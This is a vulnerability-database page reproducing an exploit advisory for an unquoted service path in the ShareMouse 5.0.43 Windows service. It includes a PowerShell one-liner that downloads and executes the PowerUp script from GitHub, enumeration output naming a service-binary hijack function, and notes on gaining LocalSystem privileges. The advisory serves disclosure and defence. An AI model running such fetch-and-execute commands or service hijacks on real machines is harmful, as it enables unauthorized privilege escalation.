Lucene search
K

ShareMouse 5.0.43 Unquoted Service Path

🗓️ 09 Sep 2020 00:00:00Reported by Alan LacerdaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 621 Views

ShareMouse 5.0.43 unquoted service path vulnerability on Windows 1

Code
`# Exploit Title: ShareMouse 5.0.43 - 'ShareMouse Service' Unquoted Service Path  
# Discovery Date: 2020-09-08  
# Discovery by: Alan Lacerda (alacerda)  
# Vendor Homepage: https://www.sharemouse.com/  
# Software Link: https://www.sharemouse.com/ShareMouseSetup.exe  
# Version: 5.0.43  
# Tested on OS: Microsoft Windows 10 Pro EN OS Version: 10.0.19041  
  
PS > iex (iwr https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1 -UseBasicParsing);  
PS > Invoke-AllChecks  
  
ServiceName : ShareMouse Service  
Path : C:\Program Files (x86)\ShareMouse\smService.exe  
StartName : LocalSystem  
AbuseFunction : Write-ServiceBinary -ServiceName 'ShareMouse Service' -Path <HijackPath>  
  
PS > wmic service where 'name like "%ShareMouse%"' get DisplayName,PathName,AcceptStop,StartName  
AcceptStop DisplayName PathName StartName  
TRUE ShareMouse Service C:\Program Files (x86)\ShareMouse\smService.exe LocalSystem  
  
#Exploit:  
# A successful attempt would require the local user to be able to insert their code in the system root path   
# undetected by the OS or other security applications where it could potentially be executed during   
# application startup or reboot. If successful, the local user's code would execute with the elevated   
# privileges of the application.  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

09 Sep 2020 00:00Current
0.7Low risk
Vulners AI Score0.7
621